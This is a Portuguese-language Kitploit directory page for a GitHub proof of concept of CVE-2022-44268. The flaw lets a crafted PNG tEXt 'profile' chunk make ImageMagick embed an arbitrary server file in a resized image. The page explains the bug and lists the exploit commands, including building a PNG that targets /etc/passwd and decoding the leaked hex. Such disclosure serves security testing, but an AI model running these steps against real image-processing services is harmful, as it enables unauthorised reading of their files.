Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-44268 — Prova de conceito de exploração para vulnerabilidade de leitura arbitrária de arquivos do ImageMagick (CVE-2022-44268) via chunks textuais PNG criados sob medida, possibilitando a extração de arquivos do sistema durante operações de redimensionamento de imagem. | Kitploit
Ferramentas/GitHubGitHub/entr0pie/cve-2022-44268
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFAprendizado e Educação
GitHubentr0pie/cve-2022-44268

CVE-2022-44268

Prova de conceito de exploração para vulnerabilidade de leitura arbitrária de arquivos do ImageMagick (CVE-2022-44268) via chunks textuais PNG criados sob medida, possibilitando a extração de arquivos do sistema durante operações de redimensionamento de imagem.

Ver Repositório
13144há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-44268

Este repositório contém uma Prova de Conceito (PoC) para uma vulnerabilidade no ImageMagick (v. 7.1.0-49), uma biblioteca de manipulação de imagens open-source amplamente utilizada. A vulnerabilidade permite que um atacante incorpore o conteúdo de um arquivo arbitrário em uma imagem redimensionada quando o ImageMagick analisa um arquivo PNG.

Descrição

Quando o ImageMagick realiza operações como redimensionamento em um arquivo PNG, ele pode incluir o conteúdo de um arquivo do sistema, desde que o binário magick tenha as permissões necessárias para lê-lo. Esta vulnerabilidade surge devido ao mau tratamento de chunks textuais em arquivos PNG.

Um agente malicioso pode explorar essa vulnerabilidade criando um arquivo PNG ou usando um existente e adicionando um tipo de chunk textual (tEXt). Esses chunks consistem em uma palavra-chave e uma string de texto. Neste caso, se a palavra-chave corresponder à string "profile" (sem aspas), o ImageMagick interpretará a string de texto acompanhante como um nome de arquivo e tentará carregar seu conteúdo como um perfil bruto. Como resultado, quando a imagem redimensionada for baixada, ela conterá o conteúdo do arquivo remoto especificado pelo atacante.

Para mais informações, veja este artigo do MetabaseQ.

Prova de Conceito

Para explorar o ImageMagick, gere um png malicioso:

root@kitploit:~
python3 CVE-2022-44268.py /etc/passwd  # Create output.png

Em seguida, execute uma operação de redimensionamento com convert:

root@kitploit:~
convert output.png -resize 50% leak.png

Finalmente, inspecione a imagem vazada e converta o Raw profile para hex:

root@kitploit:~
identify -verbose leak.png
# ...
Raw profile type:

    2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
root@kitploit:~
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"

Nota: Esta PoC é destinada apenas para fins educacionais e informativos. Certifique-se de ter as permissões e autorização legal necessárias antes de testar ou usar esta PoC em qualquer sistema.

Baixar ferramenta